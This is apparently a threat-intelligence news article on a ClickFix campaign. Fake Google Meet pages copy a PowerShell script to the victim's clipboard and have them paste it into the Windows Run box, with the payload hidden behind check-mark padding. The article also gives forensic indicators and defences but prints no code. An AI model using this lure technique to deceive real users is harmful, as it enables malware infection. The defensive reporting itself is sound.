Cybercriminals Exploit Fake Google Meet Pages to Deploy Remote Access Trojans
A sophisticated cyberattack has emerged, targeting remote workers and organizations through counterfeit Google Meet landing pages. This campaign employs the ClickFix social engineering technique to bypass traditional browser security measures and deliver Remote Access Trojans (RATs) directly to victims’ systems.
Deceptive Tactics and Execution
The attack initiates when a user visits a fraudulent site, such as gogl-meet[.]com, which closely mimics the legitimate Google Meet interface. Upon attempting to join a meeting, the user encounters a pop-up error message indicating a camera or microphone issue, titled Can’t join the meeting. Unlike standard phishing attempts that solicit credentials, this scheme offers a technical fix requiring user interaction. The prompt instructs the victim to perform specific keystrokes: Press the Windows key + R, then CTRL + V, and finally Enter.
Unbeknownst to the user, clicking the Join now or Fix button on the page triggers a JavaScript function that copies a malicious PowerShell script to their clipboard. By following the manual keystroke instructions, the user unwittingly pastes and executes this script via the Windows Run dialog, effectively bypassing browser-based security filters such as Google Safe Browsing and SmartScreen.
Forensic Analysis and Indicators
Incident response activities involving gogl-meet[.]com have confirmed that this chain leads to a RAT infection. Forensic analysis of affected systems identified the infection’s root cause through the Master File Table (MFT). Specifically, the MFT entry for the dropped payload revealed critical origin data in its Alternative Data Stream (ADS), capturing both the ClickFix downloaded file and the referrer URL gogl-meet[.]com. This forensic artifact is crucial for defenders, as it definitively links the execution of the RAT back to the browser-based social engineering event rather than a typical drive-by download or email attachment.
A distinct characteristic of this wave is the obfuscation used within the PowerShell payload itself. Threat actors have begun padding the malicious script with extensive comments containing trusted visual symbols, such as repeated green check marks. When a user pastes the content into the small Windows Run box, these symbols may be the only visible text, visually reassuring the victim that the command is verified or safe. This tactic also serves a technical purpose: it can push the actual malicious code (often an IEX download cradle) out of the immediate visible area of the dialog box, masking the script’s true intent.
Evolution of ClickFix Campaigns
While ClickFix (also associated with clusters like ClearFake) gained significant traction throughout 2024, this latest iteration demonstrates a shift toward hyper-targeted branding. Early campaigns impersonated generic browser updates or Word errors. Still, the shift to Google Meet simulation suggests a pivot toward targeting corporate environments where video conferencing glitches are a common, trusted friction point.
Defense Strategies
This attack vector proves particularly dangerous because it circumvents traditional browser security features by requiring manual user interaction rather than automated file execution. Organizations must implement comprehensive security awareness training, emphasizing that legitimate services never require users to execute PowerShell commands from email instructions. Technical defenses should include endpoint detection and response solutions capable of monitoring PowerShell execution, implementing application whitelisting, and deploying web application firewalls to block access to known malicious domains.
